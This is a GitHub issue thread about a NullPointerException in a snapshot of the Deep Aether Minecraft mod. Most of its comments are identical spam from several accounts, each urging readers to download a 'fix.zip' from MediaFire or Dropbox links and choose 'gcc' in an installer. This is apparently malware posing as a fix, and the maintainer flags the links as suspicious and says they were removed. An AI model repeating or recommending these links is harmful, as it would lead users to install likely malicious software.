### ISSUE TITLE
"p_130086_" is null

### ISSUE THREAD

**Issue by MGP-Galaxy** [TunefulTurnip/Deep-Aether#198]
### Forge/Neoforge Version

neoforge-20.4.237

### Deep Aether Version

1.20.4-1.1-snapshot-2

### Terrablender Version

3.3.0.12 for NeoForge 1.20.4

### Aether Version

1.20.4-1.4.1-neoforge

### Log Files

[2024-08-25-7.log](https://github.com/user-attachments/files/16742445/2024-08-25-7.log)

### Bug Report

The Aether has worked fine in the past and installing Aeroblender/Geckolib does not cause any issues. With Deep Aether installed, the server starts, but I cannot connect as it says...
Internal Exception: io.netty.handler.codec.EncoderException: java.lang.NullPointerException: Cannot invoke "net.minecraft.resources.ResourceLocation.toString()" because "p_130086_" is null

I have run Deep Aether on this version of Neoforge in Singleplayer successfully before.

I realize that this version of Deep Aether is a snapshot, but is there any fix?

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by TunefulTurnip** [comment]
Deep Aether for 1.20.4 is a snapshot not yet intended for regular gameplay. This issue has already been resolved and will be fixed in the next snapshot. However I strongly recommend against using the snapshot versions for regular gameplay, since it includes a lot of unfinished and buggy features for our next version of Deep Aether. Instead wait until a full release is out or stick to the 1.20.1 version. Also do not click any of the (now removed) suspicious links.
